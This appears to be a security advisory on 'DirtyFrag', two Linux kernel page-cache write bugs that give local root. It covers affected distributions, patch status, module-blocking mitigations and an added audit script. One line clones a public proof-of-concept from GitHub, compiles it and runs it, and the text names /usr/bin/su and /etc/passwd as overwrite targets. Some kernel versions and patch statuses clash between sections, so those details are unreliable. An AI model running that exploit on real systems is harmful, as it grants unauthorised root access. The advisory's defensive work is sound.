DirtyFrag — Universal Linux LPE

Two chained kernel bugs enable deterministic privilege escalation on all major Linux distributions
May 8, 2026 · Updated: May 13, 2026 · CVE-2026-43284 / CVE-2026-43500 · Security · Linux · Kernel
Critical — Patches Partially Available

DirtyFrag allows a local unprivileged attacker to obtain full root privileges. Officially assigned as CVE-2026-43284 (ESP/xfrm, CVSS 8.8) and CVE-2026-43500 (RxRPC, CVSS 7.8). Debian and RHEL/AlmaLinux have released patches for CVE-2026-43284. CVE-2026-43500 remains unpatched on most distributions.

Update — May 13, 2026

DirtyFrag has been assigned official CVE numbers: CVE-2026-43284 (xfrm/ESP, CVSS 8.8) and CVE-2026-43500 (RxRPC, CVSS 7.8). Debian (Bookworm 6.1.170-3 and Trixie 6.12.86-1) and RHEL 8/9/10 have released kernel patches for CVE-2026-43284. CVE-2026-43500 remains unpatched on most distros. Patch status table and distro blocks updated.

On May 7, 2026, a new Linux vulnerability was disclosed on the oss-security mailing list: DirtyFrag. The name describes the mechanism — fragmented, dirty page-cache writes. Unlike many kernel exploits, DirtyFrag is deterministic, requires no timing window, and does not cause kernel panics.

Successfully tested on Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44.

Background

DirtyFrag chains two independent kernel bugs in the page cache, both providing controlled write access to arbitrary files:

Bug 1 — xfrm-ESP Page-Cache Write (since 2017)

Commit cac2661c53f3 (2017) introduced a vulnerability in the IPsec subsystem (xfrm). The ESP4/ESP6 module writes uncontrollably into the page cache when processing network packets. This path requires namespace creation privileges (unprivileged by default on most distros).

Bug 2 — RxRPC Page-Cache Write (since 2023)

Commit 2dc334f1a63a (June 2023) introduced a similar bug in the RxRPC/RxKAD protocol module. This path is even broader — it requires no namespace privileges at all.

Technical Core

Both bugs allow an arbitrary 4-byte write into the Linux page cache — targeting any file the attacker can read. This is sufficient for two attack paths: overwriting /usr/bin/su with shellcode, or injecting a passwordless root entry into /etc/passwd.

Exploit Chain

xfrm-ESP bug (since 2017): 4-byte page-cache write via IPsec/ESP. Requires: namespace privileges.
RxRPC bug (since 2023): 4-byte page-cache write via RxRPC. Requires: no special privileges.
Result: root. Deterministic, no timing window, no kernel panic.

The PoC compiles in a single line:

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Note

The PoC is publicly available. Any local user on an unpatched system — e.g. in shared hosting, on a CI runner, or after an initial compromise — can obtain root.

Am I affected?

All systems running Linux kernel ≥ 4.14 (xfrm-ESP, 2017) or ≥ 6.4 (RxRPC, 2023) are potentially affected. This covers virtually every production Linux installation.

| Distribution | Kernel | ESP path | RxRPC path | Status |
| Ubuntu 24.04 LTS | 6.8.x | | | Affected |
| Debian 12 (Bookworm) | 6.1.x | | | Patched (6.1.170-3) |
| Debian 13 (Trixie / Proxmox) | 6.17.x | | | Patched (6.12.86-1) |
| RHEL 10.1 / AlmaLinux 10 | 6.12.x | | | ESP ✓ · RxRPC pending |
| openSUSE Tumbleweed | Rolling | | | Affected |
| Fedora 44 | 6.14.x | | | Affected |

Quick check — which modules are loaded:

lsmod | grep -E 'esp4|esp6|rxrpc'

No output means the modules are not currently loaded, but they can still be loaded on demand at any time. The mitigation below prevents exactly that.

Immediate Mitigation (all distros)

Until a patched kernel is available, permanently block the three vulnerable modules:

# Block modules permanently
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  > /etc/modprobe.d/dirtyfrag.conf

# Unload if already loaded
rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Verify — all three must fail
modprobe esp4; modprobe esp6; modprobe rxrpc

WireGuard Compatibility

WireGuard is not affected. The blocked modules (esp4, esp6, rxrpc) belong to the IPsec/xfrm subsystem and AFS protocol stack — WireGuard uses neither. WireGuard dependencies: udp_tunnel, ip6_udp_tunnel, libchacha20poly1305, curve25519.

Limitation

Systems actively using IPsec/IKEv2 VPN (e.g. strongSwan, Libreswan) will be affected by blocking esp4/esp6. WireGuard, OpenVPN, and other VPN solutions are not impacted.
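
The following audit script is an added example, not part of the original advisory or the PoC project. For each of esp4, esp6 and rxrpc it reports whether the module is built in, already loaded, blocked by an install rule, or still loadable. The function names and the modules.builtin check are assumptions of this example; the check is included because a module compiled into the kernel image is not affected by modprobe rules.

```sh
#!/bin/sh
# Added example: audit the DirtyFrag module mitigation on one host.
# Paths are parameters so the logic can be exercised on constructed files.

# module_state MODULE [PROC_MODULES] [MODPROBE_DIR] [BUILTIN_LIST]
# Prints one of: builtin | loaded | blocked | loadable
module_state() {
    mod=$1
    proc_modules=${2:-/proc/modules}
    conf_dir=${3:-/etc/modprobe.d}
    builtin=${4:-/lib/modules/$(uname -r)/modules.builtin}

    # Built into the kernel image: modprobe rules cannot disable it.
    if [ -r "$builtin" ] && grep -Eq "(^|/)${mod}\.ko\$" "$builtin"; then
        echo builtin; return
    fi
    # Already resident: the install rule only stops future loads.
    if [ -r "$proc_modules" ] && grep -q "^${mod} " "$proc_modules"; then
        echo loaded; return
    fi
    # An "install <mod> /bin/false" (or /bin/true) rule stops on-demand loading.
    if cat "$conf_dir"/*.conf 2>/dev/null |
        grep -Eq "^[[:space:]]*install[[:space:]]+${mod}[[:space:]]+/(usr/)?bin/(false|true)([[:space:]]|\$)"; then
        echo blocked; return
    fi
    echo loadable
}

# audit_dirtyfrag [PROC_MODULES] [MODPROBE_DIR] [BUILTIN_LIST]
# Prints one line per module; returns 0 only if all three are blocked.
audit_dirtyfrag() {
    rc=0
    for m in esp4 esp6 rxrpc; do
        state=$(module_state "$m" "$@")
        printf '%-6s %s\n' "$m" "$state"
        [ "$state" = blocked ] || rc=1
    done
    return $rc
}
```

Run audit_dirtyfrag with no arguments to check the live host; a non-zero return means at least one of the three modules is not blocked.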

Distro-specific Guide

🟠 Ubuntu 22.04 / 24.04 LTS (Affected)
Kernel: 5.15.x / 6.8.x

# Apply mitigation
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' \
  | sudo tee /etc/modprobe.d/dirtyfrag.conf
sudo rmmod esp4 esp6 rxrpc 2>/dev/null; true

# Once patch is available — remove mitigation:
sudo rm /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt upgrade -y linux-image-generic
sudo reboot

🔴 Debian 12 (Bookworm) / 13 (Trixie) (Patched)
Bookworm: 6.1.170-3 · Trixie: 6.12.86-1 · both CVEs patched

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

🟣 Proxmox VE (Patched)
Kernel: 6.17.x-pve · patched via Debian Trixie Security

sudo rm -f /etc/modprobe.d/dirtyfrag.conf
sudo apt update && sudo apt dist-upgrade -y
sudo reboot

Patch Status

As of May 13, 2026

| Distribution | CVE-2026-43284 (ESP/xfrm) | CVE-2026-43500 (RxRPC) |
| Debian 12 (Bookworm) | 6.1.170-3 | 6.1.170-3 |
| Debian 13 (Trixie) | 6.12.86-1 | 6.12.86-1 |
| Proxmox VE | via Debian Trixie | via Debian Trixie |
| RHEL 8 | 4.18.0-553.124.1 | Pending |
| RHEL 9 | 5.14.0-611.55.1 | Pending |
| RHEL 10 / AlmaLinux / Rocky | 6.12.0-124.56.1 | Pending |
| Ubuntu 24.04 / 22.04 | Pending | Pending |
| Fedora / openSUSE | Pending | Pending |
| Arch Linux | Pending | Pending |
| Mainline | 7.1-rc3+ | 7.1-rc3+ |

CVEs Assigned Retroactively

DirtyFrag was reported under a coordinated embargo that was broken before patches were ready. CVE numbers were assigned after the fact: CVE-2026-43284 (reserved 2026-05-01, published 2026-05-08) for the xfrm/ESP bug and CVE-2026-43500 (published 2026-05-11) for the RxRPC bug.
